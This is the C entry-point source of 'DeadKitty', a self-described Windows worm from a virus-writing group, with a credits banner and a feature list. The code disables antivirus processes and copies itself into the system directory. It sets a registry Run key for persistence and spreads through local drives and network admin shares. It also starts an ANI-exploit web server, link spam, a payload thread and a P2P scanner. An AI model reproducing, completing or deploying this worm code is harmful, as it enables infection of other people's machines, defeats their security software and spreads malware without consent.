/********************************************************************************
* ___ _ _ _ _ _ *
* ( _`\ ( )( ) ( ) _ ( )_ ( )_ *
* | | ) | __ _ _ _| || |/'/'(_)| ,_)| ,_) _ _ *
* | | | ) /'__`\ /'_` ) /'_` || , < | || | | | ( ) ( ) *
* | |_) |( ___/( (_| |( (_| || |\`\ | || |_ | |_ | (_) | *
* (____/'`\____)`\__,_)`\__,_)(_) (_)(_)`\__)`\__)`\__, | *
* ( )_| | *
* `\___/' *
* _ _ *
* ( ) _ ( ) *
* | | ( ) | | _ _ __ ___ ___ *
* | | | | | | /'_`\ ( '__)/' _ ` _ `\ *
* | (_/ \_) |( (_) )| | | ( ) ( ) | *
* `\___x___/'`\___/'(_) (_) (_) (_) *
* *
* *
* _ _ _ ___ *
* ( ) ( ) _ ( ) ( _`\ *
* | |_ _ _ | | ( ) | | _ _ _ __ | ( (_) _ _ ___ ___ __ *
* | '_`\ ( ) ( ) | | | | | | /'_` )( '__)| |___ /'_` )/' _ ` _ `\ /'__`\ *
* | |_) )| (_) | | (_/ \_) |( (_| || | | (_, )( (_| || ( ) ( ) |( ___/ *
* (_,__/'`\__, | `\___x___/'`\__,_)(_) (____/'`\__,_)(_) (_) (_)`\____) *
* ( )_| | *
* `\___/' *
* *
* *
* *
* *
********************************************************************************/
/********************************************************************************
* I would like to thank many people: free0n, Necronomikon, SlageHammer, izee, *
* Nibble ... very friendly people, and then Darkv0id, _Machiavel, Mike_Hood. *
* *
* The main features of this worm: *
* 1) AV killer *
* 2) Spread over local drives in zip archives *
* 3) Spread over p2p in zip archives (using a special scanner) *
* 4) Spread over netbios shares in zip archives (C$,ADMIN$ etc...) *
* 5) Spread using the ANI handling flaw with Skype & MAPI *
* (http://www.microsoft.com/technet/security/advisory/935423.mspx) *
* *
* You are free to contact me at wargame89@yahoo.it or visiting *
* http://ihateyou.altervista.org - http://vx.netlux.org/doomriderz *
********************************************************************************/
#include "DeadKitty.h"
/* The entry point of worm */
int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
char StartPath[MAX_PATH];
HKEY StartKey;
LOADED_IMAGE DeadKitty_PEImage;
WSADATA wsa;
char MsG[256],HostName[256];
struct hostent *resolve = NULL;
int NetCnt = 0,GoodIP = 0;
CreateMutex(NULL,FALSE,"DeadKitty_by_[WarGame/doomriderz]");
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
ExitProcess(0);
}
/* Get some important stuff */
GetModuleFileName(NULL,DeadKittyPath,MAX_PATH);
GetWindowsDirectory(WinDir,MAX_PATH);
GetSystemDirectory(SysDir,MAX_PATH);
/* Check itself */
if(MapAndLoad(DeadKittyPath,NULL,&DeadKitty_PEImage,FALSE,TRUE) == FALSE)
{
ExitProcess(0);
}
/* Check size of image, entry point, number of sections */
if(DeadKitty_PEImage.SizeOfImage != 0x18000
|| DeadKitty_PEImage.FileHeader->OptionalHeader.AddressOfEntryPoint != 0x87f1
|| DeadKitty_PEImage.FileHeader->FileHeader.NumberOfSections != 0x4)
{
sprintf(MsG,"Entry Point: 0x%x,NumSections: 0x%x,SizeOfImage: 0x%x",DeadKitty_PEImage.FileHeader->OptionalHeader.AddressOfEntryPoint,
DeadKitty_PEImage.FileHeader->FileHeader.NumberOfSections,DeadKitty_PEImage.SizeOfImage);
MessageBox(NULL,MsG,"Somebody corrupted me!",MB_OK|MB_ICONERROR);
ExitProcess(0);
}
/* unload all stuff */
UnMapAndLoad(&DeadKitty_PEImage);
/* Kill all hostile processes */
AVKiller();
/* Put worm at startup */
sprintf(StartPath,"%s\\DeadKitty.exe",SysDir);
CopyFile(DeadKittyPath,StartPath,FALSE);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0,KEY_WRITE,&StartKey) == ERROR_SUCCESS)
{
RegSetValueEx(StartKey,"DeadKitty",0,REG_SZ,StartPath,strlen(StartPath));
RegCloseKey(StartKey);
}
else
{
ExitProcess(0);
}
if(WSAStartup(MAKEWORD(1,1),&wsa) != 0)
{
ExitProcess(0);
}
while(!gethostbyname("www.trendmicro.com"))
{
WAIT(10);
}
/* We should be connected to the internet ... */
/* Start spreading threads */
DriveSpread(); /* spread over local drives */
NetShareSpread(); /* spread over shared resources */
/* get ip of system */
gethostname(HostName,256);
if((resolve = gethostbyname(HostName)) == NULL)
{
ExitProcess(0);
}
while(resolve->h_addr_list[NetCnt])
{
GlobalIP = inet_ntoa(*(struct in_addr *)resolve->h_addr_list[NetCnt]);
if(!strstr(GlobalIP,"192.168") && !strstr(GlobalIP,"10.0")
&& !strstr(GlobalIP,"127.0"))
{
GoodIP = 1;
break;
}
NetCnt++;
}
/* ---------------- */
if(GoodIP)
{
ANIExploiter(); /* Start our exploiting web server */
LinkSPAM();
}
PayLoad(); /* payload thread */
P2PScanner(); /* spread over p2p */
}